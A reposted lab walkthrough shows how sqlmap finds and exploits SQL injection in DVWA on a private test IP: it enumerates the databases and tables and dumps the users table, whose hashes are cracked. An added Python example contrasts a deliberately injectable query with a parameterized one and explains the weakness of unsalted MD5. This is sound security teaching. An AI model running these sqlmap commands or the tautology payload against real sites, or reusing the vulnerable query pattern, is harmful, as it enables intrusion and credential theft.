SQL injection (reposted)
1. Using Firefox (with the Firebug extension installed), log in at http://192.168.204.132/dvwa/login.php with admin/password.
2. Open Firebug's Cookies panel and copy all cookies. This gives:
PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2; path=/; domain=192.168.204.132
security=low; path=/dvwa/; domain=192.168.204.132
3. Open DVWA's SQL Injection page, enter 1 in the User ID box and click Submit. From the address bar, the URL to test is:
http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
4. Open a terminal in Kali and type sqlmap; it prints its usage text.
5. Start testing whether the URL is vulnerable to SQL injection by running:
sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low'
The result reports:
web server operating system: Windows
web application technology: PHP 5.3.29, Apache 2.4.18
back-end DBMS: MySQL >= 5.5
6. Next, find the name of the MySQL database that holds the application data:
sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low' --dbs -v 0
The result:
available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
7. Now that we know the database is dvwa, list the tables it contains:
sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low' -D dvwa --tables
The result:
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+
8. There are two tables; get the columns of the users table:
sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low' -D dvwa --tables -T users --columns
The result:
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+
9. Finally, the table data can be dumped:
sqlmap -u 'http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=5v6mbqac21vrocg5gj1vp0njl2;security=low' -D dvwa --tables -T users --columns --dump
The result:
Table: users
[5 entries]
+---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | avatar                                           | user    | password                                    | last_name | first_name | last_login          | failed_login |
+---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1       | http://127.0.0.1/DVWA/hackable/users/admin.jpg   | admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2017-04-01 00:58:43 | 0            |
| 2       | http://127.0.0.1/DVWA/hackable/users/gordonb.jpg | gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2017-04-01 00:58:43 | 0            |
| 3       | http://127.0.0.1/DVWA/hackable/users/1337.jpg    | 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2017-04-01 00:58:43 | 0            |
| 4       | http://127.0.0.1/DVWA/hackable/users/pablo.jpg   | pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2017-04-01 00:58:43 | 0            |
| 5       | http://127.0.0.1/DVWA/hackable/users/smithy.jpg  | smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2017-04-01 00:58:43 | 0            |
+---------+--------------------------------------------------+---------+---------------------------------------------+-----------+------------+---------------------+--------------+
[INFO] table 'dvwa.users' dumped to CSV file '/root/.sqlmap/output/192.168.204.132/dump/dvwa/users.csv'
The data is also exported to a local CSV file. And a nice surprise: the hashed passwords in the database were cracked as well!
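The two things the walkthrough above relies on are (a) the id parameter being concatenated straight into the SQL text on DVWA's "low" page, and (b) the password column holding unsalted MD5, which is why sqlmap could print the plaintext next to each hash. The following Python is an added example, not code from the original post, from DVWA or from sqlmap: it rebuilds a minimal stand-in for the dvwa.users table in an in-memory SQLite database using the rows from the dump, contrasts the concatenated query with a parameterized one on the same input, and verifies that each dumped hash is plain MD5 of the plaintext sqlmap reported, next to a salted, iterated hash as the storage form that would have resisted the lookup. Function names, the SQLite schema and the salts are assumptions made for the example.

```python
"""Added example (not from the original post, DVWA or sqlmap): why ?id= was
injectable and why the dumped password hashes were recoverable."""
import hashlib
import sqlite3

# Constructed from the dump in the post: (user_id, user, MD5 hash, plaintext sqlmap reported).
DUMPED_USERS = [
    (1, "admin",   "5f4dcc3b5aa765d61d8327deb882cf99", "password"),
    (2, "gordonb", "e99a18c428cb38d5f260853678922e03", "abc123"),
    (3, "1337",    "8d3533d75ae2c3966d7e0d4fcc69216b", "charley"),
    (4, "pablo",   "0d107d09f5bbe40cade3de5c71e9e9b7", "letmein"),
    (5, "smithy",  "5f4dcc3b5aa765d61d8327deb882cf99", "password"),
]


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for dvwa.users (only the columns this example needs)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(uid, name, pw_hash) for uid, name, pw_hash, _ in DUMPED_USERS],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """The pattern behind the 'low' page: the request value is spliced into the SQL text,
    so anything in ?id= is parsed as SQL rather than treated as data."""
    sql = f"SELECT user_id, user FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Parameterized query: the value is bound by the driver and never parsed as SQL."""
    sql = "SELECT user_id, user FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def hash_was_unsalted_md5(pw_hash: str, plaintext: str) -> bool:
    """True when the stored value is plain MD5 of the password: no salt, no work factor,
    so a precomputed table maps the hash back to the plaintext instantly."""
    return hashlib.md5(plaintext.encode()).hexdigest() == pw_hash


def hash_password_properly(plaintext: str, salt: bytes) -> str:
    """Salted, iterated hash (PBKDF2-HMAC-SHA256 from the standard library). A random
    per-user salt defeats precomputed tables; the iteration count slows guessing."""
    return hashlib.pbkdf2_hmac("sha256", plaintext.encode(), salt, 200_000).hex()


def demo() -> dict:
    """Run both lookups on a normal id and on a tampered one, and check the hashes."""
    conn = build_db()
    normal = "1"
    tampered = "1' OR '1'='1"  # the always-true condition the walkthrough's tool automates
    return {
        "vuln_normal": lookup_vulnerable(conn, normal),
        "vuln_tampered": lookup_vulnerable(conn, tampered),   # every row leaks
        "safe_normal": lookup_safe(conn, normal),
        "safe_tampered": lookup_safe(conn, tampered),         # no such id: empty
        "all_unsalted_md5": all(hash_was_unsalted_md5(h, p) for _, _, h, p in DUMPED_USERS),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The concatenated lookup returns a single row for a normal id and every row for the tampered one; the parameterized lookup returns the same single row for the normal id and nothing for the tampered one, because the whole string is compared as a value. The MD5 check confirms the dump's parenthesised plaintexts are simply the MD5 preimages, which is the property a salted, iterated hash removes.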
Some sqlmap options (sqlmap -h prints the full English help):
--cookie : set our cookie value (used here to "set the DVWA security level from high to low")
-u : specify the target URL
-b : retrieve the DBMS banner
--current-db : retrieve the current database
--current-user : retrieve the current user
--string : string to match in the page when the query is true
--users : enumerate DBMS users
--passwords : enumerate DBMS user password hashes
--dbs : enumerate databases in the DBMS
-D : DBMS database to enumerate
--tables : enumerate tables in the DBMS database
--columns : enumerate all columns of the DBMS database table
-T : DBMS database table to enumerate
-C : DBMS database table column(s) to enumerate
--dump : dump the DBMS database table entries
Many thanks to the original blogger for sharing; I learned a lot from it: http://blog.csdn.net/qq_20745827/article/details/68953621